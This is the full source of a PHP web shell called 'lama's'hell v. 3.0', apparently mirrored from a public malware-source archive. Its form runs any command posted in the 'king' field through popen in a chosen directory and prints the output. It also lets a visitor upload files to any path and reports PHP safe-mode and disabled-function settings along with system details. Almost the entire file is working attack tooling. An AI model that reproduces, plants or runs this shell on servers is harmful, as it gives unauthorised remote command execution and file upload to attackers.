mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
90 lines
2.5 KiB
C
90 lines
2.5 KiB
C
<?
|
|
if($_POST['dir'] == "") {
|
|
|
|
$curdir = `pwd`;
|
|
} else {
|
|
$curdir = $_POST['dir'];
|
|
}
|
|
|
|
if($_POST['king'] == "") {
|
|
|
|
$curcmd = "ls -lah";
|
|
} else {
|
|
$curcmd = $_POST['king'];
|
|
}
|
|
|
|
|
|
?>
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
|
|
"http://www.w3.org/TR/html4/loose.dtd">
|
|
<html>
|
|
<head>
|
|
<title>lama's'hell v. 3.0</title>
|
|
<style type="text/css">
|
|
body {
|
|
color: white; background-color: black;
|
|
font-size: 12px;
|
|
font-family: Helvetica,Arial,Sans-Serif;
|
|
}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<pre>
|
|
_ _
|
|
/ \_______ /|_\
|
|
/ /_/ \__
|
|
/ \_/ /
|
|
_|_ |/|_
|
|
_|_ O _ O _|_
|
|
_|_ (_) _|_
|
|
\ /
|
|
_\_____________/_
|
|
/ \/ (___) \/ \
|
|
\__( o o )__/ <?
|
|
$ob = @ini_get("open_basedir");
|
|
$df = @ini_get("disable_functions");
|
|
if( ini_get('safe_mode') ) {
|
|
echo "SM: 1 \\ ";
|
|
} else {
|
|
echo "SM: 0 \\ ";
|
|
}
|
|
if(''==$df) {
|
|
echo "DF: 0 \\ ";
|
|
} else {
|
|
echo "DF: ".$df." \\ ";
|
|
}
|
|
echo "".php_uname()."\n";
|
|
?>
|
|
<hr></pre>
|
|
<table><form method="post" enctype="multipart/form-data">
|
|
<tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
|
|
<tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
|
|
<td><input name="exe" type="submit" value="Execute"></td></tr>
|
|
|
|
<tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
|
|
<td><input name="upl" type="submit" value="Upload"></td></tr>
|
|
</form></table>
|
|
<pre><hr>
|
|
<?
|
|
if(($_POST['upl']) == "Upload" ) {
|
|
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
|
|
echo "The file has been uploaded<br><br>";
|
|
} else {
|
|
echo "There was an error uploading the file, please try again!";
|
|
}
|
|
}
|
|
if(($_POST['exe']) == "Execute") {
|
|
$curcmd = "cd ".$curdir.";".$curcmd;
|
|
$f=popen($curcmd,"r");
|
|
while (!feof($f)) {
|
|
$buffer = fgets($f, 4096);
|
|
$string .= $buffer;
|
|
}
|
|
pclose($f);
|
|
echo htmlspecialchars($string);
|
|
}
|
|
?>
|
|
</pre>
|
|
</body>
|
|
</html>
|